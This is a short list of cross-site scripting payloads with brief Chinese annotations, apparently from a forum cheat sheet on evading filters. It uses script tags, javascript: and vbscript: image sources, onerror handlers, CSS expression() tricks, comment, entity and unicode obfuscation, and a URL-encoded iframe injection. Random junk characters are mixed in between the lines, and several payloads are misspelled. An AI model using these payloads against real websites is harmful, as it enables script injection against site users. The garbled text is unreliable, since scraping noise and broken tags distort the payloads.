<script>alert("跨站")</script> (最常用)
1 t& G# x: Q4 Z% A, h& n) \<img scr=javascript:alert("跨站")></img>* L1 H7 }# y" m. L
<img scr="javascript: alert(/跨站/)></img>; ?& p# S8 u$ R7 R
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)% d$ U% g" F; X5 B) z
<img scr="#" onerror=alert(/跨站/)></img>
: E* D5 ]4 P: H( F, R4 x3 S<img scr="#" style="xss:expression(alert(/xss/));"></img>2 I# }$ d* f2 C, z" O% J" t
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)8 |4 U) n# c. l
<img src=vbscript:msgbox ("xss")></img>& y1 |; u' e8 d: z9 X
<style> input {left:expression (alert('xss'))}</style>
3 V- K& @9 a3 l* L9 a- f3 D5 Z<div style={left:expression (alert('xss'))}></div>
% ]1 q6 Y4 ~* N" ?' U<div style={left:exp/* */ression (alert('xss'))}></div>' f s5 S# e1 w* }8 E+ Y4 f) D
<div style={left:\0065\0078ression (alert('xss'))}></div>
v9 P. m7 y! Q7 I8 t# \) Fhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
' ]5 L9 g0 q: N" G6 D+ gunicode <div style="{left:expRessioN (alert('xss'))}">
6 _8 k4 G4 Z& t5 M4 N9 R$ ^. k# {2 I; o/ S, Z
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["1 E1 I9 L* \' j a3 }2 d4 h
|